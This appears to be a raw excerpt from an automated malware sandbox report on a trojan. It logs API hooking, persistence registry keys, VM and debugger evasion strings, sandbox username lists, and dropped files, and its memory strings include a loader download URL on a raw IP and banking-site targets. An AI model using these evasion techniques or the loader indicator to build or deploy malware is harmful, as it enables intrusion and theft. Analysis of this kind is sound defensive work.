Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH2197.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH457A.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH6566.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH8552.TMP
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9429EC LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00007FF6CF9429EC
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 0_2_00007FF6CF943C40
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 4_2_00007FF6BCCA3C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 5_2_00007FF78FA63C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 9_2_00007FF7A34B3C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 13_2_00007FF67F553C40
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: svchost.exe Binary or memory string: PROCESSHACKER.EXE
Source: svchost.exe Binary or memory string: X64DBG.EXE
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: INVALID STRING POSITIONSTRING TOO LONGWCSCPYMSVCRT.DLLWCSCATWCSCMPWCSNCPYWCSLENSTRLENREALLOCFREEWCSSTRCLOSEHANDLEKERNEL32.DLLCREATEFILEWFREELIBRARYMOVEFILEWGETFILESIZEEXGETWINDOWSDIRECTORYAGETVOLUMEINFORMATIONAGETTICKCOUNTWSPRINTFWUSER32.DLLWSPRINTFAVIRTUALALLOCREADFILESLEEPVIRTUALFREESETFILEPOINTERCREATEDIRECTORYWFINDFIRSTFILEWFINDNEXTFILEWFINDCLOSECOPYFILEWWRITEFILEGETSYSTEMDIRECTORYWEXITPROCESSCREATEPROCESSWSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWGETSHORTPATHNAMEWGETENVIRONMENTVARIABLEWINTERNETOPENWWININET.DLLINTERNETOPENURLWHTTPQUERYINFOAINTERNETREADFILEINTERNETCONNECTWHTTPOPENREQUESTWHTTPSENDREQUESTAINTERNETCLOSEHANDLESHGETFOLDERPATHWSHGETFOLDERPATHASHGETKNOWNFOLDERPATHPATHISURLWSHLWAPI.DLLPATHCOMBINEWPATHFINDFILENAMEWREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAREGSETVALUEEXAREGCLOSEKEYOPENPROCESSTOKENGETTOKENINFORMATIONADJUSTTOKENPRIVILEGESGETUSERNAMEWLOOKUPPRIVILEGEVALUEACOUNINITIALIZEOLE32.DLLCOCREATEINSTANCECOINITIALIZEMESSAGEBOXAMOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64) APPLEWEBKIT/537.36 (KHTML, LIKE GECKO) CHROME/129.0.0.0 SAFARI/537.3SEDEBUGPRIVILEGEVECTOR<T> TOO LONGREFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/LOADER.BINVMWARE.EXEVMWARE-VMX.EXEVBOXSERVICE.EXEVBOXTRAY.EXESVCHOST.EXEMICROSOFTEDGEUPDATEBAD LOCALE NAMEIOS_BASE::BADBIT SETIOS_BASE::FAILBIT SETIOS_BASE::EOFBIT SET%SYSTEMROOT%\SYSTEM32\SVCHOST.EXEGEORGEABBYDARREL JONESJOHNJOHN ZALINSKYJOHN DOESHCTAGA3RMUV0U6479BOGY8WJXNBZWALKEROXYT3LZGGZMKT3WOBOWWAWUH6PNJAAKW.QSMDVVCP06AAY3MLFANLLPJPQLAVKFB0LT07HV8BUT5BISCZAFGXGD9FQ4IV8FRANKANNAWDAGUTILITYACCOUNTWDAGUTILITYACCOUNTHAL9THVIRUSMALWARESANDBOXSAMPLECURRENTUSEREMILYHAPUBWSHONG LEEIT-ADMINJOHNSONMILLERMILOZSMICROSOFTSAND BOXMALTESTPAUL 
JONESVMRAYDIAMOTRIX{%08LX%04LX%LU}ZBI\.EXE.LNK\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENSERVICESUNKNOWN.FIREFOX.EXEEXPLORER.EXE\MRT.EXE\MOZILLA\FIREFOX\PROFILES\*RELEASE\DRIVERS\ETC\HOSTSVIRUSTOTAL
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: 28C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: 48C0000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle, 3_2_08B721B0
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 500000
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 7531
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 9688
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 626
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 605
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Window / User API: threadDelayed 1328
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Window / User API: threadDelayed 3629
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\select.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\python38.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe API coverage: 1.7 %
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep count: 293 > 30
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep time: -263700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep count: 7531 > 30
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep time: -3765500000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep count: 233 > 30
Source: C:\Windows\System32\svchost.exe TID: 6428 Thread sleep time: -209700s >= -30000s
Source: C:\Windows\explorer.exe TID: 4160 Thread sleep time: -147000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7160 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4160 Thread sleep time: -9688000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe TID: 4760 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe TID: 5948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9466F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 0_2_00007FF6CF9466F0
Source: C:\Windows\explorer.exe Code function: 3_2_11056AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA, 3_2_11056AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 4_2_00007FF6BCCA66F0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA666F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 5_2_00007FF78FA666F0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 9_2_00007FF7A34B66F0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E985A0 FindFirstFileExW,FindClose, 10_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 10_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E985A0 FindFirstFileExW,FindClose, 12_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 12_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 12_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342DFC FindFirstFileExW, 12_2_00007FF8B8342DFC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EFEC FindFirstFileExW,FindClose,FindNextFileW, 12_2_00007FF8B836EFEC
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5566F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 13_2_00007FF67F5566F0
Source: C:\Windows\explorer.exe Code function: 3_2_08B72CE0 GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc, 3_2_08B72CE0
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 500000
Source: C:\Windows\explorer.exe Thread delayed: delay time: 90000
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: explorer.exe, 00000003.00000002.3316980175.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2100969793.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
